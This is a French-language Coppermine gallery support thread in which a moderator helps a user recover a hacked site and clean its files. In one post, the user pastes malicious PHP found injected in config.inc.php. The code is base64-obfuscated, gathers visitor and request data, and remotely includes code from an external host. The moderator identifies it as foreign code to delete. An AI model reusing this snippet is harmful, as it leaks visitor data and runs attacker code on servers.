Advanced search  

News:

cpg1.5.46 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter recently discovered vulnerabilities. It is important that all users who run version cpg1.5.44 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Demande d'aide  (Read 3044 times)

0 Members and 1 Guest are viewing this topic.

koukic11

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Demande d'aide
« on: January 04, 2010, 03:42:15 pm »

Bonjour à tous

J'ai créé il y a un peu + d'1 an un site pour une assoc sportive.
Pour avoir une galerie de photos, j'ai utilisé Coppermine. Après installation et paramètrage, tout était ok et les administrateurs mettaient 1 à 2 photos tous les 3 jours.
Or, depuis quelques jours, on ne peut plus accéder à Coppermine, une page blanche se met à la place (cf http://www.socarcassonne.fr/coppermine/thumbnails.php?album=17).

Je sais que la base existe encore car sur le site, avant d'accéder à Coppermine, je liste des différents albums mis en place (cf http://www.socarcassonne.fr/soc_photos.php).

Savez-vous pourquoi j'ai ceci ? Un paramétrage a été touché ou alors il existe une date limite ? Est-ce que quelqu'un a 1 idée ? Parce que, du coup, je ne peux pas rentrer dans l'administration (puisque page blanche), il ne me reste plus que le compte FTP.

Merci d'avance.

PS : je ne me souviens plus de la version utilisée, c'était en oct./nov. 2008.
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9097
  • aka Frantz
    • Ma galerie
Re: Demande d'aide
« Reply #1 on: January 04, 2010, 04:52:42 pm »

Bonjour,

c'est une version 1.4.18, donc très ancienne. Vous avez peut êté victime d'un piratage.
Pour remédier à ce problème, il convient de nettoyer tout ça. il y a un post en anglais qui explique tout ça http://forum.coppermine-gallery.net/index.php/topic,51927.0.html.
en cherchant un peu sur le forum francophone vous trouverez aussi pas mal de posts à ce sujet avec un certain nombre de solutions.
En tout cas, c'est un processus long et minutieux.
Si vous ne trouvez pas comment faire, n'hésitez pas à revenir ici...
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

koukic11

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Demande d'aide
« Reply #2 on: January 04, 2010, 05:24:56 pm »

merci de votre réponse.

comment est-ce possible de se faire pirater ?  :(
ce mot veut bien dire pas mal de chose mais qu'entendez-vous par là ?

enfin, je vous remercie quand-même pour votre post.
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9097
  • aka Frantz
    • Ma galerie
Re: Demande d'aide
« Reply #3 on: January 04, 2010, 05:38:19 pm »

En fait, un script comme Coppermine peut laisser parfois des portes ouvertes à des esprits mal intentionnés. Des failles de sécurité sont découvertes de temps en temps et très rapidement contrées par l'équipe de développement qui publie à ce moment là un correctif ou une nouvelle version. C'est pourquoi nous en sommes à la version 1.4.25.
Il est très difficile pour une équipe de développement de tout pouvoir tester, ce qui explique ces failles. (Il en existe dans tous les programmes informatiques, plus ou moins faciles à exploiter). Dans le cas de Coppermine, le plus souvent, il s'agit de lacunes permettant, sous certaines conditions de tromper le système et d'accèder aux paramètres de Coppermine, voir parfois au serveur. Les pirates en profitent parfois pour utiliser votre serveur pour servir de passerelles, ou simplement en s'amusant à défaire un site juste pour montrer qu'ils sont les plus forts. Je ne sais pas dans votre cas ce qui c'est passé. Il est certainement possible de rétablir la situation, mais pour celà, il faut regarder ce qui se trouve encore sur le serveur via votre client FTP, et regarder si il n'y a pas de bouts de codes ou de fichiers qui trainent (en particulier dans le fichier config.inc.php, et dans le répertoire albums).
Le plus simple serait déjà de faire une mise à jour. Pour ce faire, voici la manip:
*Téléchargez la dernière version stable de Coppermine (cpg1.4.25 à ce jour) et placez les fichiers sur votre serveur en vous assurant que vous remplacez bien tous les fichiers sauf le répertoire albums, le fichier include/config.inc.php et le dossier contenant votre thème personnalisé le cas échéant. Utlisez pour cela un client FTP fiable comme Filezilla par exemple.
*Ensuite lancez le script updtate.php depuis votre navigateur et regardez si votre site réapparait.
Si c'est le cas, une grande partie est faite, il vous faudra juste vérifier qu'il n'y a pas de fichier ou de dossiers n'appartenant pas à coppermine, ni de bouts de codes dans les fichiers laissés (il faut les ouvrir avec un éditer de texte comme notepad par exemple).
Si cette manip vous semble hors de vos compétences, dites le, je vous enverrais un email avec mes coordonnées pour que vous me fasiez parvenir les codes necessaires et je regarderais ça pour vous
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

koukic11

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Demande d'aide
« Reply #4 on: January 05, 2010, 03:52:18 pm »

ok, je vous remercie de votre aide, j'apprécie !  :D
j'utilise déjà Filezilla et NotePad++, c'est déjà 1 bon départ ! ;D

j'essaye la mise à jour et je vous tiens au courant.
Logged

koukic11

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Demande d'aide
« Reply #5 on: January 06, 2010, 12:16:46 am »

François

J'ai téléchargé la dernière version de Coppermine et j'ai remplacé tous les fichiers sauf albums et include/config.inc.php. Je n'ai pas de thème perso.
J'ai lancé update.php (celui de la racine, je ne me trompe pas ?). D'ailleurs, à ce sujet, mon navigateur n'affiche rien, c'est normal ? www.socarcassonne.fr/coppermine/update.php
Et, toujours rien ...  :o

Vous avez une idée ?

Idée + simple peut-être : n'est-il pas + simple de récupérer ttes les photos dans les albums et de repartir de 0 avec la nouvelle version ? c'est-à-dire : suppression des répertoires et re-installation...
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9097
  • aka Frantz
    • Ma galerie
Re: Demande d'aide
« Reply #6 on: January 06, 2010, 07:27:15 am »

Quote
Idée + simple peut-être : n'est-il pas + simple de récupérer ttes les photos dans les albums et de repartir de 0 avec la nouvelle version ? c'est-à-dire : suppression des répertoires et re-installation...
si vous avez beaucoup de photos, c'est énormément de travail puisqu'il faut recrée la base de donnée.
Je pense qu'il faut continuer les investigations:
n'y a t'il pas de fichier .htaccess dont le contenu serait susceptible d'empêcher l'affichage ?
le fichier config.in.php dans le dossier includes contient il les bonnes infos de connexion à la base de donnée ?
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

koukic11

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Demande d'aide
« Reply #7 on: January 06, 2010, 10:27:34 am »

OK, je viens de regarder. je n'ai pas de fichier .htaccess.
Et sur le fichier config, ce sont bien les bonnes infos de connexion à la base. maintenant, le code qui suit, je suppose qu'il est correct mais je ne le connait pas :

$CONFIG['TABLE_PREFIX'] =                'corp_';
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bfbhazzazbzchi".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bfbhazzazbzchi".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>

Vous ne m'avez pas répondu : est-ce normal qu'en lancant le update.php il ne se passe rien à l'affichage ? cad, page blanche...
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9097
  • aka Frantz
    • Ma galerie
Re: Demande d'aide
« Reply #8 on: January 06, 2010, 11:25:15 am »

le code posté est inscriot dans le fichier config.inc.php ? si oui, c'est pas normal. le fichier ne doit pas contenir autre chose que ceci
Code: [Select]
// Coppermine configuration file

// MySQL configuration
$CONFIG['dbserver'] = 'Nom de votre serveur de base de données (chez Free, entrez sql.free.fr)';// Your database server
$CONFIG['dbuser'] =   'Votre nom d\'utilisateur pour la base de données';// Your mysql username
$CONFIG['dbpass'] =   'Votre mot de passe d\'accès à la base de données';// Your mysql password
$CONFIG['dbname'] =   'Nom de votre nouvelle base de données';// Your mysql database name


// MySQL TABLE NAMES PREFIX
$CONFIG['TABLE_PREFIX'] = 'cpg1410_';//Ne changez pas ce paramètre
le reste ne fait pas partie de Coppermine, il faut donc l'effacer.
regardes ensuite si il n'y a pas d'autres fichiers (parmis ceux qui n'ont pas été changés lors de la mise à jour) qui contiennent un code similaire ?

Réponse à la question sur update.php, non ce n'est pas normal
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog
Pages: [1]   Go Up
 

Page created in 0.018 seconds with 20 queries.